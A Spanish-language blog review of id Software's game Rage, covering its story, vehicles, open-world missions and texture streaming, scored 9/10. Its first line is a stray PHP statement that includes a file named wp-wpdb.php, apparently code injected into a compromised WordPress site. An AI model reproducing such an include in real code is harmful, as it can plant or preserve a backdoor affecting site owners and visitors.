if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis de Rage – La Fortaleza de LeChuck

Análisis de Rage

Rage es el nuevo trabajo de ID Software. Hablar de ID es fácil, tan solo tengo que dejar en estas lineas varias de sus obras, hablan por si solas: Doom, Quake, Wolfenstein 3D,… creo que no hace falta continuar.

Esta vez, y conjuntamente a Bethesda, nos traen una propuesta diferente y arriesgada. Rage es un shooter si, pero no solo es un shooter. Es algo más. Con el nuevo motor idTech 5 y una estupenda mezcladora, que ya quisiera Tom Cruise para él en Cocktail, han fusionado diferentes géneros consiguiendo una gran experiencia.

En Rage, nos encontramos en La Tierra en el año 2029, una catástrofe está apunto de suceder, un meteorito va a alcanzar a nuestro planeta y va a borrar todo rastro de vida existente. Antes de que ocurra los gobiernos pactan en que un grupo de elegidos serán criogenizados y despertarán en el futuro, cuando la vida pueda volver a ser posible. 106 años después tu cápsula se abre y “vuelves a la vida”. Pero algo no salió como se había previsto. Los humanos se encuentran en pequeño número en aldeas separadas entre sí. Intentan sobrevivir como pueden, ya sea de entre ellos, de los bandidos o de unos mutantes bastante molestos.

Las aldeas o pequeñas ciudades se encuentran separadas unas de otras, de forma que ir andando sería un gran paseo. Aquí viene la principal función de los vehículos, hacernos de transporte de un sitio a otro, lógico ¿verdad?. Las carreteras serán peligrosas, por lo tanto podremos equipar a nuestro buggie de diferentes armas para contrarrestar los ataques de los bandidos. Y ya que hablamos de vehículos, vemos el alcance que ha querido conseguir ID Software con Rage. El juego no será lineal, ni pasillero. Será un mundo abierto donde podremos movernos por donde queramos, sin seguir un orden principal, lógicamente hay un modo historia que cumplir, pero aquí está su principal aliciente.

No nos dedicaremos únicamente a pegar tiros a cada habitación o sala que entremos, si no que podremos elegir una misión de búsqueda de una persona, solucionar problemas con la antena de una radio o similares. Estas misiones secundarias las podremos encontrar en tablones de anuncios de las ciudades o hablando con los personajes que nos vayamos encontrando por la calle. Efectivamente, es un shooter con grandes tintes de sandbox. Una mezcla de géneros muy efectiva. Incluso podremos disputar carreras con nuestros vehículos.

Gráficamente Rage destila maestría, reconocemos que ID está ahí detrás, aunque adolece de unas texturas cambiantes que ensombrecen el buen resultado. Un truco muy usado, por ejemplo por el motor de Unreal, el no cargar toda la textura para que el dibujado sea más rapido y que al poco tiempo cargue para tener ya el escenario completo. Tardan demasiado en mostrarse y vemos durante más tiempo de lo necesario las texturas en baja resolución. Un fallito que espero que mejoren en nuevas obras que utilicen el idTech 5.

Rage es un estupendo juego, que trae de vuelta por la puerta grande a ID Software, acompañados por Bethesda. Su mezcla shooter con sandbox es perfecta, dan al juego una duración mayor y una complejidad de movimientos que no vas a encontrar en otros FPS, donde solo prima la acción sin descanso en cerrados entornos.
Nota: 9/10

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.